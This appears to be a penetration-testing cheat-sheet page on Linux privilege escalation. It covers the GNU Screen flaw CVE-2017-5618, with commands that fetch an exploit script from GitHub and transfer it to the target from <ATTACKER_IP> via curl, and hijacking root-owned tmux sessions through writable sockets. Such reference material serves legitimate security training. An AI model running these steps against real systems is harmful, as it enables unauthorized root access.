PRIMARY CATEGORY → LINUX PRIVESC
GNU Screen
CVE-2017-5618
Affected Versions
4.5.1 and lower ( 4.05.00 == 4.5.0 )
From the Target 🎯
screen -vSetup
- Downloading the Script
From the Attacker ⚔️
curl --silent --location --request GET 'https://github.com/YasserREED/screen-v4.5.0-priv-escalate/raw/refs/heads/main/full-exploit.sh' --output exploit.bash- Transferring the file to the Target
From the Attacker ⚔️
python -m http.server 80From the Target🎯
cd /dev/shm && curl --silent --location --request GET 'http://<ATTACKER_IP>/exploit.bash' --remote-nameUsage
bash exploit.bashTmux
More information about TMUX here
Hijacking TMUX Sessions
Once we start our enumeration to find out a way to privesc, we reach the point where we list the running processes on the system
ps -fauxWe take a look and see that there is a TMUX session running as ROOT or another privileged user
According to this, we know that sysadmins might be used to using TMUX on this server
If so, we can examine this further by running the following filter commands
pgrep --full --list-full -- 'tmux'
ps -faux | grep -i --color=always -- 'tmux'Once we know that there is at least on active TMUX session on the server, we must look for the existing sockets related to the sessions
Bear in mind that any user that has read and write privileges on a TMUX socket can create or attach an existing TMUX server session via the socket
Therefore, we could proceed as follows to search for any TMUX socket for which the current user has write permissions
find / -path '*tmux*' -type s -writable 2> /dev/nullThen, we can attach to the existing session, which is running as Root or any other privileged user, by issuing the following command
tmux -S <SOCKET> a